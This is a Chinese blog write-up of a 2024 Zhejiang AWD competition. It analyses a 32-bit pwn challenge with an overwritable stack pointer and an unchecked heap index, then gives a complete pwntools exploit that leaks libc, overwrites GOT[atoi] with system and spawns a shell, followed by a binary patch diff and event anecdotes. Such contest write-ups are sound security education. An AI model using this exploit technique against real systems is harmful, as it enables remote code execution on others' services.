2024浙江通信行业职业技能竞赛 - awd

2024浙江通信行业职业技能竞赛 - awd

RocketDev

本次awd共2道web一道pwn

队友:Doddy & mysid

从上午的个人赛发现几乎都没什么人会pwn,疯狂拿分夺得第三!

pwn赛题

题目可以在Releases 附件中找到

文件属性

属性
Arch x86
RELRO No
Canary on
NX on
PIE off
strip no
libc 2.31-0ubuntu9.16

程序粗解

C++菜单题,只用到了coutendl,使用atoi来把输入的字符串转换为int

漏洞分析

  1. main函数中输入菜单项时,在栈上存在可以覆盖的指针,随后可以对指针写入任意内容

bug1

"%4094s"不允许修改,否则过不了check

add

  1. edit函数中输入的索引可以基于heap做任意写,未经检查

bug2

个人题解

可以先利用任意地址写把GOT[atoi]写到heap上,这样show就能leak libc; 然后再利用edit就可以把system的地址写上去,最后输入 '/bin/sh' 就可以拿shell

本来想再次利用scanf原语的,但是输入的是system的数字,实际写的时候却变成了-1, 知道原因的话可以评论

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
from pwn import *
context.terminal = ['tmux','splitw','-h']
GOLD_TEXT = lambda x: f'\x1b[33m{x}\x1b[0m'
EXE = './pwn3'

def payload(lo:int):
global sh
if lo:
sh = process(EXE)
if lo & 2:
gdb.attach(sh)
libc = ELF('/usr/lib32/libc.so.6')
else:
sh = remote('10.103.2.3', 9999)
libc = ELF('./libc.so.6')
elf = ELF(EXE)

sh.sendlineafter(b'shop===', b'1'.ljust(0x30, b'\0') + p32(elf.symbols['heap']))
sh.sendlineafter(b'Size', str(elf.got['atoi']).encode())
sh.sendlineafter(b'shop===', b'3')
sh.sendlineafter(b'Index', b'0')
sh.recvuntil(b'content:')

libcBase = u32(sh.recv(4)) - libc.symbols['atoi']
success(GOLD_TEXT(f'Leak libcBase: {libcBase:#x}'))
libc.address = libcBase
info(f'system@{libc.symbols["system"]:#x}')

sh.sendlineafter(b'shop===', b'4'.ljust(0x30, b'\0') + p32(elf.got['atoi']))
# sh.sendlineafter(b'Size', str(libc.symbols['system']).encode())
sh.sendlineafter(b'Index', b'-7')
sh.sendlineafter(b'content:', p32(libc.symbols['system']))
sh.sendlineafter(b'shop===', b'/bin/sh')

sh.clean()
sh.interactive()

参考修复方案

先上个通用沙箱,然后patch以下问题

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
--- orig.S
+++ patched.S
@@ -8049b69,8049b7c +8049b69,8049b7c @@
; main
-8d 85 f4 ef ff ff lea eax, [ebp - 0x100c]
-83 c0 30 add eax, 0x30
-8b 00 mov eax, DWORD PTR [eax]
+8d 83 60 00 00 00 lea eax, [ebx + 0x60] ; &data_start
+90 nop
+90 nop
+90 nop
+90 nop
83 ec 0c sub esp, 0xc
50 push eax
e8 2a fa ff ff call add
@@ -8049a95,8049ab3 +8049a95,8049ab3 @@
; edit
8b 45 f0 mov eax, DWORD PTR [ebp - 0x10]
8d 14 85 00 00 00 00 lea edx, [eax * 4]
-8d 83 70 00 00 00 lea eax, [ebx + 0x70] ; heap
-01 d0 add eax, edx ; &heap[index]
+8d 83 68 00 00 00 eax, [ebx + 0x68] ; &DW.ref.__gxx_personality_v0
+90 nop
+90 nop
83 ec 04 sub esp, 0x4
6a 08 push 0x8
50 push eax
6a 00 push 0x0
e8 0c f8 ff ff call read

第一处修改,把地址修改为bss上的地址个人认为比较好,但是第二处修改由于本质上没有做检查, 忽略了index,实际上有所疏漏,只是能过check,不能算一个好的方案

比赛经历分享

7月31号到达酒店,第二天作为凌武科技实习生参加比赛。早上是个人赛,理论题+CTF,下午是团队赛AWD,8月3号还有一天的渗透赛,我没报名,提前溜了

系统用的是跟上海赛一模一样的系统

live

中饭主办方提供了堂食,还不错

lunch

下午打awd的时候,由于场上没多少人会pwn(由上午的个人赛中,pwn的简单题除了我只有1人解出可见),当我拿出exp时,那一轮直接拿了900+的分,不过后面强队修洞,弱队关服务, 最后一轮只拿了300+分。最后也是顺利拿下了第三名,晚上出去搓了一顿

dinner

比赛还发了参赛证,长下面这样,顺便还贴了前几名的成绩

score

更新于24/09/11

个人赛只打了2道pwn+1道简单的逆向,理论题都是瞎做的,结果意外拿了个人三等奖,团队最后拿了二等奖,后面去移动大厦领奖了。大公司的装修就是不一样啊

conference

  • 标题: 2024浙江通信行业职业技能竞赛 - awd
  • 作者: RocketDev
  • 创建于 : 2024-08-06 23:31:00
  • 更新于 : 2024-09-11 19:03:00
  • 链接: https://rocketmadev.github.io/2024/08/06/awd/
  • 版权声明: 本文章采用 CC BY-NC-SA 4.0 进行许可。
评论
目录
2024浙江通信行业职业技能竞赛 - awd